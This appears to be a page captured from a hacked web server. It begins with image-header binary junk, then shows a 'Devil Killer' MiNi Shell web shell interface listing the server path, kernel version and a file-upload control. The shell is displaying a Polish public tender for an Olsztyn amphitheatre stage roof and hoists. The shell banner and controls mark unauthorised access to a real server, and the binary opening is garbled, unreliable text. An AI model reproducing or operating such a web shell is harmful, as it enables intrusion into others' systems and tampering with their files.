JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240430/0030779501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> dostawa fabrycznie nowego zadaszenia sceny Amfiteatru im. Czesława Niemena w Olsztynie wraz z osprzętem i pierwszym montażem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Kultury w Olsztynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000678825</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbrowszczaków 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-538</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89/5221350</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mok.olsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mok.olsztyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> dostawa fabrycznie nowego zadaszenia sceny Amfiteatru im. Czesława Niemena w Olsztynie wraz z osprzętem i pierwszym montażem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4f40dd73-06d0-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00307795</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00064600/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 dostawa fabrycznie nowego zadaszenia sceny Amfiteatru im. Czesława Niemena w Olsztynie wraz z osprzętem i pierwszym montażem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.olsztyn.eu/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.olsztyn.eu/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu komunikacja<br/>pomiędzy zamawiającym a wykonawcami, w szczególności składanie zapytań do treści SWZ, oświadczeń, zawiadomień oraz<br/>przekazywanie informacji, odbywa się elektronicznie przy użyciu Platformy Zamówień Publicznych Gminy Olsztyn pod adresem<br/>https://zamowienia.olsztyn.eu oraz poczty elektronicznej email e.fedorowska@mok.olsztyn.pl. We wszelkiej korespondencji<br/>związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zamowienia.olsztyn.eu/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z 04.05.2016, str. 1), zwanym dalej RODO, Administratorem Danych Osobowych przetwarzanych w celu przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz późniejszej realizacji umowy jest Miejski Ośrodek Kultury w Olsztynie, ul.<br/>Dąbrowszczaków 3, 10-538 Olsztyn.<br/>2. Platforma Zamówień Publicznych Gminy Olsztyn prowadzona pod adresem https://zamowienia.olsztyn.eu/ jest platformą<br/>zamówień publicznych utworzoną dla Gminy Olsztyn i jej jednostek. Utworzenie Konta Użytkownika na platformie jest równoznaczne<br/>z upoważnieniem platformy do przetwarzania danych osobowych Użytkownika, przekazanych za pośrednictwem platformy podczas<br/>zakładania Konta Użytkownika, jak również wprowadzonych do platformy w ramach korzystania z platformy.<br/>3. W sprawach dotyczących przetwarzania danych osobowych można kontaktować się z Inspektorem Ochrony Danych na adres<br/>email: iod@mok.olsztyn.pl lub wysyłając korespondencję na adres siedziby Miejskiego Ośrodka Kultury w Olsztynie,<br/>ul. Dąbrowszczaków 3, 10-538 Olsztyn.<br/>4. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w związku z przeprowadzeniem przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz późniejszą realizacją umowy.<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 74 Pzp, lub którym udostępniona zostanie umowa. Dane mogą być także udostępniane podmiotom zapewniającym<br/>zamawiającemu komunikację elektroniczną oraz bankom podczas wykonywania transakcji rozliczeniowych. W celu zapewnienia<br/>stałego dostępu do danych osobowych, ich skutecznego, bezbłędnego i bezpiecznego przetwarzania, rozwoju i utrzymania<br/>systemów informatycznych, dane będą udostępniane dostawcom wykorzystywanych przez zamawiającego systemów<br/>informatycznych z zachowaniem poufności i bezpieczeństwa przetwarzania. Dane osobowe będą przechowywane przez okres 5 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a w przypadku umowy przez okres 10 lat. Okres<br/>przechowywania umowy obejmuje czas niezbędny do umożliwienia dochodzenia roszczeń przez strony.<br/>6. W przypadku korzystania przez wykonawców z prawa do środków ochrony prawnej określonych w Dziale IX PZP, mogą być<br/>udostępniane informacje o wyrokach skazujących, naruszeniach prawa i powiązanych z tym środkach bezpieczeństwa (o których<br/>mowa w art. 10 RODO).<br/>7. Obowiązek podania przez wykonawcę danych osobowych jest wymogiem wynikającym z przepisów ustawy Prawo zamówień<br/>publicznych, związanym z udziałem wykonawcy w postępowaniu o udzielenie zamówienia publicznego. Niepodanie przez<br/>wykonawcę danych osobowych uniemożliwi zamawiającemu wykonanie czynności związanych z badaniem i oceną oferty oraz<br/>ewentualne zawarcie umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ADM.371.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 626000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	komplet nowej konstrukcji łukowej zadaszenia sceny Amfiteatru im. Czesława Niemena w Olsztynie z dodatkową 1 kreską sztywną w tylnej części, plandekami i osłonami, plus 3 dodatkowe kreski ruchome za pomocą oddzielnych wciągarek elektrycznych, zadaszenie ma swoją powierzchnią osłaniać cała powierzchnię sceny o wym. 12x10m, uwzględniając zapas z każdej strony oraz zapis pkt 5,<br/>2)	konstrukcja łukowa zadaszenia wykonana w oparciu o kratownice aluminiowe, czterorurowe, dostosowane do oczekiwanej nośności konstrukcji,<br/>3)	konstrukcja oparta na minimum 4 słupach – Zamawiający wskazuje w przypadku słupów przednich wykorzystanie istniejących fundamentów kotwiczenia zadaszenia, miejsca kotwiczenia wskazuje rzut sytuacyjny (zaznaczone na czerwono) stanowiący załącznik nr 2.2 do niniejszego SWZ, gdy wykonawca proponuje zakotwiczenie słupów w nowych miejscach-niezbędna jest zgoda właściwego Wojewódzkiego Konserwatora Zabytków z uwagi, iż Amfiteatr w Olsztynie jest położony na terenie urbanistycznym Starego Miasta,<br/>4)	nie dopuszcza się wykorzystania obciążeń balastowych,<br/>5)	w przypadku zakotwiczenia słupów w istniejących fundamentach, zadaszenie<br/> w przedniej części ma wychodzić minimum 2 m przed linię przednich słupów w stronę widowni,<br/>6)	wysokość dolnej krawędzi zadaszenia musi znajdować się minimum 8 metrów nad poziomem podłogi sceny o wysokości 71 cm (minimalny wymiar okna sceny 12m x 8m – jako wymiar okna rozumiana jest odległość pomiędzy wewnętrznymi krawędziami słupów przednich zadaszenia sceny oraz odległość pomiędzy powierzchnią podłogi sceny a dolną krawędzią kratownicy stanowiącej obwiednię zadaszenia scenicznego),<br/>7)	możliwość zawieszenia na konstrukcji ładunku o obciążeniu:<br/>a)	przedniej kratownicy obwiedni ciężarem rozłożonym minimum 200 kg, rozumiany jako ciężar samego zawieszanego sprzętu,<br/>b)	tylnej kratownicy obwiedni ciężarem rozłożonym minimum 400 kg, rozumiany jako ciężar samego zawieszanego sprzętu,<br/>c)	bocznych kratownic obwiedni ciężarem rozłożonym minimum 100 kg, rozumiany jako ciężar samego zawieszanego sprzętu,<br/>d)	dodatkowe obciążenie skupione belek bocznych dwoma dodatkowymi kratownicami minimum 250kg w odległości od 150cm do 400cm od tylnego wózka – miejsce podwieszenia dodatkowych ruchomych belek zwanych kreskami, rozumiany jako ciężar samego zawieszanego sprzętu,<br/>e)	kratownic służących do zawieszenia systemu nagłośnieniowego minimum 600 kg na stronę po zewnętrznych stronach przednich słupów, rozumiany jako ciężar samego zawieszanego sprzętu,<br/>8)	obciążenia z punktu 7 a-c maja mieć możliwość podwieszenia na konstrukcji i uniesienia razem z czaszą dachu. System nagłośnieniowy oraz dodatkowe kreski będą wciągane na dodatkowych wciągarkach elektrycznych,<br/>9)	do konstrukcji dachu zostaną dostarczone trzy dodatkowe kreski z kratownic czterorurowych na pełna szerokość zadaszenia z możliwością obciążenia równomiernie rozłożonego 400kg każda,<br/>10)	konstrukcja ma posiadać możliwość podnoszenia i opuszczania zadaszenia za pomocą wciągarek elektrycznych 4 sztuki, każda do jednego słupa konstrukcji, sterowanych z jednego punktu wskazanego przez Zamawiającego; wciągarki elektryczne leżą po stronie Wykonawcy, min. 1000kg, zabezpieczenie typu parametr D8, nie starsze niż rok produkcji 2022; zamontowane wciągarki mają być zabezpieczone przed czynnikami atmosferycznymi - rozwiązanie zabezpieczenia po stronie wykonawcy (proponowane zabezpieczenie Wykonawca wskaże w Formularzu oferty – załączniku nr 1 do SWZ),<br/>11)	Wykonawca zapewni 2 sztuki wciągarek elektrycznych dla sprzętu nagłośnieniowego/dźwiękowego Zamawiającego, – min. 1000kg każda wciągarka na stronę po zewnętrznych stronach przednich słupów, zabezpieczenie typu parametr D8+, nie starsze niż rok produkcji 2022,<br/>12)	do dodatkowych 3 kresek ruchomych, 6 wciągarek po min. 500 kg parametr D8+, po jednej na każdą stronę kresek, nie starsze niż rok produkcji 2022 - 1 dodatkowa kreska ruchoma blisko obwiedni, 2 kreski ruchome w części tylnej do 4m obwiedni,<br/>13)	komplet konstrukcji zadaszenia rok produkcji nie starszy niż 2023,<br/>14)	zamówienie obejmuje dostawę 1 sztukę nowego sterownika: min. 8 kanałowy sterownik do wciągarek słupów i do wciągarek kresek,<br/>15)	wciągarki mają spełniać wszelkie obowiązujące normy dla tego typu urządzeń <br/>i wymagania obciążeniowe Zamawiającego; podlegają dozorowi technicznemu na podstawie Rozporządzenia Rady Ministrów z dnia 7 grudnia 2012 r. w sprawie rodzajów urządzeń technicznych podlegających dozorowi technicznemu oraz Rozporządzenia Ministra Przedsiębiorczości i Technologii z dnia 30 października 2018 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji, napraw i modernizacji urządzeń transportu bliskiego,<br/>16)	plandeka zadaszenia w kolorze czarnym, plandeka wykonana będzie z materiału wodoszczelnego typu PCV i trudno zapalnego, nie nosząca oznak naprawy (łaty, klejenia itp.),<br/>17)	czoło-przednia część zadaszenia z przezroczystego PCV – górna część wzdłuż łuku, dolna krawędź plandeki w linii prostej – zapewniająca zmniejszenie zacinania padającego deszczu na scenę,<br/>18)	konstrukcja może być demontowana poza okresem letnich wydarzeń,<br/>19)	na konstrukcji należy zainstalować dwa niezależne wiatromierze – z możliwością rejestracji, <br/>20)	konstrukcja powinna wytrzymać prędkość wiatru co najmniej 70km/h z zapiętymi siatkami. <br/>4.	Konstrukcja dopuszczona do obrotu i stosowania; niezbędne jest dostarczenie atestu zakładowego na całość konstrukcji, atesty trudnozapalności na plandekę i siatki oraz deklarację zgodności producenta na kompletne zadaszenie (przedmiotowe środki dowodowe wskazane w Rozdziale XVIII). Dostarczony przedmiot zamówienia powinien spełniać wszelkie wymagania techniczne i jakościowe określone przez Zamawiającego, normy bezpieczeństwa w zakresie wykonawstwa, montażu i remontów konstrukcji spawanych.<br/>5.	Wykonawca zobowiązuje się do zapewnienia możliwości nabycia części zamiennych do przedmiotu zamówienia przez cały okres gwarancji wskazany w Formularzu oferty, załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44210000-5 - Konstrukcje i części konstrukcji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42141410-6 - Wciągarki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ocenie i porównaniu poddane zostaną oferty niepodlegające odrzuceniu. Zamawiający dokona oceny<br/>ofert w zakresie kryterium wskazanego w SWZ. W tym celu przeprowadzona zostanie ocena każdej oferty. Zamawiający dokona<br/>weryfikacji oraz przypisania punktów dla kryterium oceny oferty oraz wyliczy łączną ocenę punktową oferty według wskazanego w<br/>SWZ wzoru</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga, aby wykonawca dostarczył przedmiotowe środki dowodowe w postaci:<br/>1)	atestu zakładowego na całość konstrukcji, <br/>2)	atesty trudnozapalności na plandekę i siatki, <br/>3)	deklarację zgodności producenta na kompletne zadaszenie,<br/>4)	projekt/rysunek proponowanego zadaszenia,<br/>5)	deklaracje zgodności CE na wciągarki, o których mowa w Rozdziale V pkt 3 ppkt 10, 11, 12.<br/>2.	Zamawiający, zgodnie z art. 107 ust. 2 Pzp przewiduje możliwość wezwania wykonawców do złożenia lub uzupełnienia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> wszystkich przedmiotowych środków dowodowych, tj.: 1) atestu zakładowego na całość konstrukcji,<br/>2) atesty trudnozapalności na plandekę i siatki,<br/>3) deklarację zgodności producenta na kompletne zadaszenie,<br/>4) projekt/rysunek proponowanego zadaszenia,<br/>5) deklaracje zgodności CE na wciągarki. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Wypełnione oświadczenie o niepodleganiu wykluczeniu z udziału w postępowaniu – załącznik nr 9 do SWZ.<br/>2.Przy dostawie - dostarczenia instrukcji montażu i użytkowania zadaszenia.<br/>3.Wykonawca przed podpisaniem umowy wniesie zabezpieczenie należytego wykonania umowy w wysokości 5% ceny<br/>całkowitej podanej w ofercie.<br/>4.Wykonawca zobowiązuje się posiadać przez cały okres obowiązywania Umowy ubezpieczenie odpowiedzialności cywilnej<br/>w związku z prowadzoną działalnością gospodarczą na sumę gwarancyjną nie niższą niż 500.000,00 PLN. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) wykonawcy zobowiązani są do ustanawiania pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>2) wypełnione oświadczenie dotyczące niepodlegania wykluczeniu z udziału w postępowaniu (zgodnie z załącznikiem nr 9<br/>do SWZ) składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>2. W przypadku wyboru oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę tych wykonawców.<br/>5. W przypadku ofert składanych wspólnie przez dwóch lub więcej wykonawców, zabezpieczenie należytego wykonania<br/>umowy może być wniesione przez wszystkich wykonawców łącznie, przez ich część lub jednego wykonawcę, przy czym z<br/>treści dokumentu musi wynikać, że zobowiązanie gwaranta/poręczyciela dotyczy wszystkich wykonawców, którzy złożyli<br/>ofertę wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 